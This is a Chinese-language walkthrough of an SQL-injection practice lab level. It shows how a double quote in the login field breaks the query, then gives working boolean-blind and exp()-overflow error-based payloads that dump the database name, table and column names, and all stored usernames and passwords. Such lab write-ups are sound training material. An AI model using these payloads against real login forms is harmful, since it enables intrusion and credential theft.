本关我们直接进行测试,输入username:admin"
Pasword:(随意)
可以看到报错了,那么我们知道了id进行了 " 的操作。
这里和less13一样,主要是利用盲注。可以使用布尔注入或者报错注入。
布尔注入,举例列一下payload:
uname=admin" and left(database(),1)>'n'#&passwd=1&submit=Submit
可以登录成功。
报错注入。
利用exp()函数造成double数值类型超出范围进行报错注入的Payload形式如下:
uname=admin" union select (exp(~(select * from (select database())a))),2 #
Explain:
(1)MySQL exp(x)函数 返回e(自然对数的底)的x次方的值,但是这个数学函数有一个问题,那就是当传递一个大于709的值时,函数exp()就会引起一个溢出错误。
(2)~表示取反操作,将0按位取反就会返回“18446744073709551615”。再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。
(3)我们通过子查询与按位求反,造成一个“DOUBLE value is out of range”错误,并借由此注出数据。
下面我们来演示一下本关的注入过程。
爆数据库
uname=admin" union select(exp(~(select * from (select database())a))),2 #&passwd=1&submit=Submit
爆security的数据表
uname=admin" union select(exp(~(select * from (select group_concat(table_name) from information_schema.tables where table_schema=database())a))),2 #&passwd=1&submit=Submit
爆users表中的列
uname=admin" union select(exp(~(select * from (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')a))),2 #&passwd=1&submit=Submit
爆users表中的内容
uname=admin" union select(exp(~(select * from (select group_concat(username,0x3a,password) from users)a))),2 #&passwd=1&submit=Submit
参考:https://www.cnblogs.com/lcamry/articles/5509124.html